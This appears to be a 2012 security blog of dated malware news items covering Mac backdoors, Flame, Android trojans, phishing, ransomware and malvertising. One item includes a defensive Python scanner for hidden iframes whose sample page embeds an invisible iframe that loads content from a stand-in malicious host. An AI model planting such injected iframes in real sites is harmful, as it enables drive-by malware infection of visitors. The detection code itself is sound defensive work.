Jul 05

OSX continues to be exploited

Once again, Apple’s OS X is being confronted with a security risk. The latest backdoor has been discovered by Russian security firm Kaspersky Lab and is being used as part of an Advanced Persistent Threat campaign. This is just the latest in a series of security risks present in the Mac OS X operating system.

Kaspersky researchers found that Uyghur activists in China were being targeted by hackers. These hackers sent e-mails with a compromised attachment that was in the form of a JPEG. The code hidden inside the JPEG was a new form of the MaControl backdoor and is compatible with both the PowerPC and i386 Mac variants.

The researchers found that the Command and Control server that the malware was reporting back to was located in China. This suggests that it could be the government trying to keep tabs on these activists. For years, users believed that Mac OS X was safer than Windows. However, with all of these recent outbreaks, people are starting to realize this is not the case.

It had seemed safer because few hackers targeted Macs, owing to their low market penetration. Apple has now acknowledged the changing times and taken down a claim from its website that Macs weren’t susceptible to the same malware that Windows PCs are. Clearly, they are no longer sure this is the case.

Most recently, Kaspersky Lab researchers found that cyberthreats targeting the Mac OS X platform have been used as part of a comprehensive campaign against Uyghur activists, apparently presumed to be using Macs, by sending customized e-mails with attached ZIP files that carry a malicious Mac OS X backdoor.

Like untold threats targeting Windows, the infected ZIP file is delivered as a phishing attack leveraging social engineering techniques, enticing victims with a JPEG photo that masks the malware.

The Mac OS X attack appears to be a new threat, detected as the most recent variant of the MaControl backdoor Trojan, which supports both i386 and PowerPC Macs. Once it gains entry, the Trojan installs itself on the Mac and immediately connects to its command and control center, which appears to be located in China, for instructions. The backdoor then has the ability to list and transfer files, as well as run commands on the victim’s Mac at the discretion of the malware’s operators.

The new MaControl variant is the latest in a string of recent APT-driven attacks this year targeting the Mac OS X platform. In April, Kaspersky Lab researchers detected an active APT campaign, known as SabPub, which targeted Mac OS X by exploiting a vulnerability in MS Office running on the platform. Once the Trojan was installed on a victim’s Mac, it could take screenshots of the user’s current session and execute commands on the infected computer.

Prior to that, the Flashback Trojan ran rampant on users’ Macs, creating a botnet comprised of more than 700,000 infected computers.

While Mac threats haven’t yet reached the same heights as their Windows counterparts, the numbers are rising steadily and will continue to grow, thanks in large part to a rising Mac OS X market share.

That said, the barrage of new Mac threats could open up new opportunities for security partners with tried and true mechanisms long-deployed on Windows environments. For one, the rising tide of Mac threats could easily pave the way for channel partners to add Mac security products and mechanisms to their portfolio.

Also, unlike previous years, the highly publicized spate of Mac threats will allow partners to simply start conversations with their customers in regards to securing their Mac environments.

Historically, with market share in the single digits, Mac OS X has not been a highly lucrative target for cyber criminals. As such, Macs became known as the “secure” platform, lulling users into a false sense of security and making them largely resistant to any external security product or best practice.

But that might be changing. As threats targeting the Mac platform continue to emerge, many users will have to play “catch-up,” with everything from security best practices and awareness, to products and management for Mac environments.

Those knowledge gaps leave potential windows of opportunity for the channel, enabling partners to essentially go back to square one with basic security consulting services, and standard security software dedicated to the Mac OS X platform once thought to be immune to threats.


May 29

Stuxnet type malware discovered in Middle East

Researchers have discovered what they describe as the most sophisticated malware ever found, running rampant in the Middle East. First revealed by Kaspersky Lab, Flame is several times larger than Stuxnet, and appears to have been targeted at Iran’s oil ministry and main oil export terminal.

Flame is a backdoor Trojan with worm-like features that allow it to replicate in a local network and on removable media on command. Once a machine’s infected, it starts sniffing network traffic, taking screenshots, intercepting the keyboard and even recording audio conversations.

It’s a huge package of modules, comprising almost 20 MB in size when fully deployed.

What’s most astonishing is that Kaspersky believes that the Worm.Win32.Flame virus has been out there undetected for over two years.

Among other things, it can use a computer’s microphone to record conversations, take screenshots of particular applications when in use, record keystrokes, sniff network traffic and communicate with nearby Bluetooth devices.

One of the toolkit’s first versions was likely created in 2010 and its functionality was later extended by leveraging its modular architecture, said Vitaly Kamluk, chief malware expert at Kaspersky Lab.

Flame is much bigger than both Duqu and Stuxnet, which at around 500KB in size were already considered large by security experts. The size of all Flame components combined adds up to over 20MB and one file in particular measures over 6MB alone, Kamluk said.

Another interesting aspect of the threat is that some parts of Flame were written in Lua, a programming language that’s highly uncommon for malware development. Lua is often used in the computer gaming industry, but Kaspersky Lab hadn’t seen any malware samples before Flame that were written in the language, Kamluk said.

Flame spreads to other computers by copying itself to portable USB devices and also by exploiting a now-patched Microsoft Windows printer vulnerability that was also leveraged by Stuxnet.


May 18

Facebook and Android top malware targets

Android plagued with malware

Android smartphones rock, but whether you use Avast, Lookout, the new Sophos, or another freebie antivirus/security app, you better lock and load to protect your Android before you become a victim and a stat.

Android, once dubbed a “cyber menace,” is too popular, too juicy and potentially too lucrative a target for malware writers to ignore. In fact, a new F-Secure report suggests malware writers are getting craftier by creating trojanized apps that can defeat anti-virus detection. F-Secure released its latest mobile threat report [PDF] covering the first quarter of 2012, and Android malware has grown exponentially. Since a year ago, the number of new malware variants has quadrupled and the number of malicious Android application package files (APKs) had a “staggering” increase of “139 to 3063 counts.”

Facebook target of malware campaign

A new fraud campaign aims to separate users of Facebook, Google Mail, Hotmail, and Yahoo from their debit card data.
We’ve recently discovered a series of attacks being carried out by a P2P variant of the Zeus platform against some of the Internet’s leading online services and websites.

The Facebook scam offers people a 20% discount if they link their Visa or MasterCard details to their Facebook account. “The scam claims that after registering their card information, the victim will earn cash back when they purchase Facebook points,” said Klein. A fake Web form then requests that the user enter their debit card number, its expiration date, as well as their security code and PIN.

In the Gmail, Hotmail, and Yahoo variations, the scam “offers an allegedly new way of authenticating to the 3D Secure service offered by the Verified by Visa and MasterCard SecureCode programs,” said Klein. In particular, the scam suggests that Google and Yahoo users can tie the 3D Secure password issued by their bank to, respectively, their Google Checkout and Yahoo Checkout accounts. It then requests the person’s debit card number, expiration date, security code, and 3D Secure PIN code. For Hotmail users, attackers have tweaked the language slightly to suggest that without the 3D Secure code being entered, users won’t be able to use Hotmail to make any purchases.



May 14

Malware threats growing online and getting tougher to detect

New Malware Campaign

A new malware campaign is making the rounds of the Internet, taking advantage of curiosity and sympathy surrounding the passing of Beastie Boys’ Adam Yauch (a.k.a. MCA).

Trend Micro said the attack appeared to target specific recipients, using a news item about Yauch’s death as a social engineering lure.

“We have found an email sample that leverages Yauch’s death to entice users to download and open the malicious attachment. The message appears as a news item from a non-profit organization that features the late musician’s recent passing,” it said.

It said the email contains a .DOC file attachment, which is supposed to contain the complete story.

But users who download and open the .DOC attachment are actually executing malware detected by Trend Micro as TROJ_DROPPR.JET.

“This Trojan file drops another malicious file, detected as particular TROJ_SWYSYN.SME, that connects to possibly malicious URLs,” Trend Micro said.

Online ads serving malware

One of the sneakiest scams among cybercrooks these days involves malicious advertisements that can infect a computer with nasty software even if a person merely lands on a website where the ads appear and doesn’t click on them.

These sinister ads, called “malvertisements,” can steal bank account passwords, disable computers or cause other mischief, and have claimed millions of victims. And some experts fear worse problems may be ahead.

“What we are seeing today is the canary in the mine,” said Craig Spiezle, executive director of the nonprofit Online Trust Alliance, which seeks to bolster consumer confidence in cyberspace. “It’s an early warning and if we don’t do more to secure the ad infrastructure, we run the risk of having much broader distribution of malware than we have today.”

Phony Flash Player

Adobe Flash Player users beware: A website that promises visitors a free copy of the download for all versions of Android is reportedly planting malware on smartphones running Google’s mobile operating system.

The infected web page used to distribute the malware was discovered in a number of Russian domains, wrote Karla Agregado, a fraud analyst with Trend Micro, in a recent company blog. A similar tactic emerged last month to infect Android phones with bogus copies of Angry Birds and Instagram.

When a visitor clicks the download button at the infected site, Agregado explained, a connection is made to another site that, without the guest’s knowledge, sends a malicious APK file to the mobile web surfer’s smartphone.

Once on the phone, the malware starts to secretly send text messages to premium numbers. This scam is a popular one among cyber criminals targeting Android phones.

Amnesty International targeted by malware

People visiting Amnesty.org.uk on Wednesday and Thursday were exposed to malicious code that exploited a now-patched vulnerability in Oracle’s Java software framework, according to a blog post published Friday by Websense. End users who hadn’t yet applied the patch were infected with Gh0stRat, a family of malware that siphons sensitive data from victims’ machines and can also operate Web cams and microphones in real time. The trojan came to light in 2009 when researchers reported that it infiltrated government and private offices in 103 countries. That included computers belonging to the Dalai Lama.

The Java vulnerability targeted on the Amnesty International site has been used in the past to install malware on computers running both Microsoft Windows and Apple’s OS X. Recently, similar espionage attacks have migrated to OS X, and the Flashback malware attack believed to have infected more than 500,000 Macs targeted the same bug. Based on the Websense post, however, it appears this week’s attacks infected only Windows users.

May 11

FBI warns about hotels installing malware

The FBI warned people traveling abroad that attackers are targeting users on hotel networks by tricking them into installing malware under the guise of software updates. The agency’s Internet Crime Complaint Center says any government, business or academic personnel traveling abroad should be especially wary.

The FBI issued an advisory this week alerting international travelers about attempts to infect their computers with malware when they log on to hotel networks.

In an intelligence note from the FBI’s Internet Crime Complaint Center (IC3), the agency warned that attackers have been targeting travelers abroad when they use the Internet connection in their hotel rooms. According to the FBI, when the victims attempt to set up the hotel room Internet connection, they were presented with a pop-up window notifying them to update a “widely-used software product.”

“If the user clicked to accept and install the update, malicious software was installed on the laptop,” according to IC3. “The pop-up window appeared to be offering a routine update to a legitimate software product for which updates are frequently available.”

The FBI recommends checking the author or digital certificate of any prompted update to see whether it corresponds to the software vendor, and advises travelers to update the software on their laptops immediately before traveling.

May 08

A week of malware, exploits, ransomware and cybersecurity

New Java Exploit Kit:

Researchers from SpiderLabs recently spotted RedKit, a private web malware exploitation kit that exploits popular, already patched Java vulnerabilities and has a QA (quality assurance) element built into it.

What’s so special about RedKit, and how does it differentiate itself from the rest of the exploit kits currently observed in the wild? Besides exploiting CVE-2010-0188 and CVE-2012-0507, the cybercriminals behind the kit also offer, as a managed service, legitimate traffic that is later converted into malware-infected hosts.

Malware already taking advantage of Olympics:

Security researchers from Trend Micro have intercepted currently circulating 2012 Olympics-themed emails containing malicious attachments.

The cybercriminals behind the campaign are enticing end users and corporate users into opening the malicious Microsoft Office (.doc) attachment, which upon execution will attempt to exploit CVE-2010-3333 (RTF Stack Buffer Overflow Vulnerability) and will later drop a backdoor on the infected PCs.

How safe are QR Codes?

The codes have proved to be popular with marketers, even if they are not well understood by many mobile users: a recent survey by analyst firm Russell Herder suggested that more than half of all respondents — including more than 80 per cent of respondents in the 18-24 bracket — had seen QR codes, while around 16 per cent of all respondents had actually scanned one.

Tellingly, however, one out of five respondents had no idea what a QR code is. That’s around the same percentage — 22 per cent — of Fortune 50 companies that are experimenting with QR codes in their marketing, and not entirely without success: a separate study by Comscore suggested that 14 million U.S. residents scanned QR codes in June 2011 alone.

While marketers wrestle with building demand for the codes, consumers may unwittingly be wrestling with something far more threatening: what if that barcode led your smartphone to a malware-infected Web site? And what if that malware was optimized to target Apple’s iOS, Google’s Android, or other mobile operating systems with a Trojan that would run in the background and send passwords to its masters?

Religious sites found to contain more malware than porn sites:

Religious sites may pose a much bigger cyber-threat to surfers than adult or pornographic sites, according to a study by Symantec, a computer security vendor.

Symantec said its Internet Security Threat Report’s 2011 trends published in April showed that, “Religious and ideological sites were found to have triple the average number of threats per infected site than adult/pornographic sites.”

Moreover, it said “We hypothesize that this is because pornographic website owners already make money from the Internet and, as a result, have a vested interest in keeping their sites malware-free – it’s not good for repeat business.”

New ransomware:

Security researchers from Trusteer have intercepted a ransomware variant being pushed using the Citadel crimeware platform.

The ransomware is pushed using drive-by malware attacks. Upon execution, the following activities take place:

Once installed on the victim’s computer, the ransomware locks up the targeted machine and displays a warning message notifying the user that they have violated United States Federal Law. The web inject screen (below) claims the IP address belonging to the infected machine was identified by the Computer Crime & Intellectual Property Section as having visited websites that contain child pornography and other illegal content. In order to unlock their computer, the victim is instructed to pay a $100 fine to the US Department of Justice using prepaid money card services. The payment service options presented to the victim are based on the geographic location of their IP address. For example, users with US IP addresses must pay using MoneyPak or Paysafecard.

What’s particularly interesting about this campaign is that it is a good example of campaign optimization by the cybercriminals behind it: it adds multiple monetization vectors. Not only will they earn revenue from the ransomware variant, they will also be able to hijack online banking transactions thanks to the Citadel crimeware that remains active on the system.

A campaign of “ransomware” is locking people out of their computers unless they pony up the right amount of money.

Spotted by security blog abuse.ch, the malware taps into an exploit kit known as “Blackhole.” Sold underground, Blackhole is used by criminals to infect computers through security holes in the browser or third-party plug-ins, such as Java and Adobe Reader.

If the version of Java, for example, is not up to date with the latest patches, the downloaded file will exploit the software’s weakness by downloading the Trojan to the PC and then running it. Once the PC is infected, the user will receive a message on the screen saying that the computer has been locked for illegally downloading pirated music.

The message aimed toward those in the U.K. further says that “to unlock your computer and to avoid other legal consequences, your are obligated to pay a release fee of 50 pounds,” around $80. The directions instruct the user to submit payment using an online payment system called Paysafecard. The message itself tries to look official with a logo of the Metropolitan Police at the top.

The malware has so far been targeting users in the U.K., Germany, France, Switzerland, Austria, and the Netherlands. The criminal behind this campaign appears to speak German, according to abuse.ch, since the local URLs used in this scam are all in German. But the messages are, of course, written in the native language of the intended victims of each country, even going so far as to tell them where and how to obtain Paysafecard locally.

The ransomware carries a further payload in the form of a Trojan called Aldi Bot, which steals banking information, abuse.ch added.


May 03

Hacked Websites Deliver Drive-by Android Malware

Cyber criminals often put drive-by download malware on websites they have hacked in order to quickly infect visitors’ PCs. For the first time though, hacked websites with Android drive-by download malware have been discovered.

A new Trojan, called NotCompatible, appears to serve as a simple TCP relay while posing as a system update named “Update.apk.” It does not currently seem to cause any direct harm to a target Android device, but could potentially be used to gain access to private networks by turning an infected smartphone into a proxy.

IT administrators should note that a device infected with NotCompatible could potentially be used to infiltrate normally protected information or systems, such as those maintained by enterprises or governments. Security firm Lookout (via Reddit) describes how when a user visits a compromised website from an Android device, the malicious app is automatically downloaded.

Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system.

The style of attack is known as a drive-by download and is common on the desktop: When someone visits a hacked website, malware can transparently infect the computer if it doesn’t have up-to-date patches.

The trojan is embedded into iframes of compromised websites, and automatically downloads itself if the page is visited by an Android device. Lookout has dubbed the trojan “NotCompatible”, although the downloaded file is simply called “Update.apk”. Right now there are only a handful of sites that have been compromised with the APK, so Lookout predicts that the total fallout will be low.

The hacked websites have a hidden iframe at the bottom of a page; an iframe is a window that brings other content into the target Web site. The iframe causes the browser to pull content from two other malicious websites hosting NotCompatible. If a PC accesses either of those websites, a “not found” error is displayed, Lookout said.
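As an added example (not code from Lookout or from the original post), here is a small Python scanner for the pattern described above: it flags iframes that are styled or sized to be invisible and whose source points to a host other than the page itself. The sample page and all hostnames are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> tag in an HTML document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_hidden(attrs):
    """Heuristics for an iframe the visitor is not meant to see:
    display:none / visibility:hidden, off-screen absolute positioning,
    or a frame no larger than 1x1 pixel."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    if "position:absolute" in style and ("left:-" in style or "top:-" in style):
        return True

    def tiny(value):
        value = value.strip().rstrip("px").strip()
        return value.isdigit() and int(value) <= 1

    return tiny(attrs.get("width", "")) and tiny(attrs.get("height", ""))


def find_hidden_iframes(html_text, page_url):
    """Return the hidden iframes in html_text whose src is served from a
    host other than the page's own host (relative srcs stay on-site)."""
    page_host = urlparse(page_url).hostname or ""
    parser = _IframeCollector()
    parser.feed(html_text)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        src_host = urlparse(src).hostname or page_host
        if _is_hidden(attrs) and src_host != page_host:
            findings.append({"src": src, "host": src_host})
    return findings


# Constructed sample: a legitimate visible widget frame plus a hidden
# off-site frame injected at the bottom of the page.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="/widgets/weather" width="300" height="150"></iframe>
<p>Site content ...</p>
<iframe src="http://malicious-host.example/update" width="0" height="0"
        style="display:none"></iframe>
</body></html>"""


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE, "http://victim-site.example/"):
        print("hidden off-site iframe ->", hit["src"])
```

Because the malicious hosts in this campaign answered PCs with a “not found” page, a crawler that follows the flagged src should fetch it with a mobile User-Agent before concluding the frame is harmless.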

Apr 23

Android Malware disguised as Instagram App

Cashing in on the popularity surrounding popular photo-sharing application Instagram, a number of fake versions of the app are doing the rounds online.

Cyber criminals have created fake versions of the Instagram Android app, designed to earn money from unsuspecting users.
When users download the Instagram app from anywhere other than the official Google Play store, or directly from the Instagram Web site, they are running the risk of infecting their smartphones with malware.

One example is a Russian Web site that mimics the look of the Instagram site, and offers users a free download.
The resulting download is a malicious app that appears to earn its creators revenue by sending SMS messages in the background.

Recently, users looking to download Angry Birds Space were also being targeted. Other popular smartphone apps being used in the scheme are Fruit Ninja, Temple Run and Talking Tom Cat.

Apr 22

Malware spreading via tweets

Fake anti-virus software has been around for a while, and the reason is that the attackers who spread it convince you your computer is in trouble, and they’ve got the solution. Now, these attackers are using Twitter to reach victims, and delivering malware in the process.

If you see tweets promising “proven,” “trusted” or “excellent” anti-virus software, especially tweets ending in .TK or .tw1.su, do not click on them. The posts have been spreading around Twitter for days and are currently still active; they take those who click the links to sites hosting the BlackHole exploit kit, a malicious Russian Web app that in turn redirects victims to malware sites.

Users who click on the fake anti-virus links receive an alert that their computer is infected, and the fake anti-virus program will perform a scan of their system. The scan, of course, reports that it detects a number of Trojans on the victim’s computer, and then prompts them to install fake anti-malware software.

So far, scammers have compromised 453 Twitter accounts, and used them to spam these malicious links over 4,200 times. Even worse, the malware that poses as anti-malware updates itself to avoid detection. The security company GFI Labs identified a rogue anti-virus Trojan, “Trojan.Win32.Fakeav.tri,” that updates every three to six hours. Another Trojan, posing as a security program called “Windows Antivirus Patch,” operates on a 24-hour update schedule.

Apr 22

FBI Closing down the Internet on infected systems

The FBI has warned that thousands of web users worldwide could lose Internet access after a hacker’s advertising scam infected computers.

The problem started after international hackers ran an online advertising scam to get control of infected computers around the world.

In response, the FBI set up a safety net months ago using government computers to prevent Internet disruptions for those infected users. However, that system is to be shut down.

It is estimated that hackers have targeted a network of about 570,000 computers.

They took advantage of vulnerabilities in the Microsoft Windows operating system to install malicious software on the victims’ computers. This turned off antivirus updates, and most victims don’t even know their computers have been infected, although the software has probably slowed their web surfing and disabled their antivirus software.

The FBI is encouraging users to visit a website run by its security partner that will inform them whether they’re infected and explain how to fix the problem. After July 9, infected users will not be able to connect to the Internet due to DNS failures.

The FBI believes that on the day of the arrests, at least 568,000 unique Internet addresses were using the servers, 85,000 of them US-based.

Other countries have victims with more than 20,000 each, including Italy, India, England and Germany.

According to the FBI, the hackers have earned at least 14 million dollars in the scam. (ANI)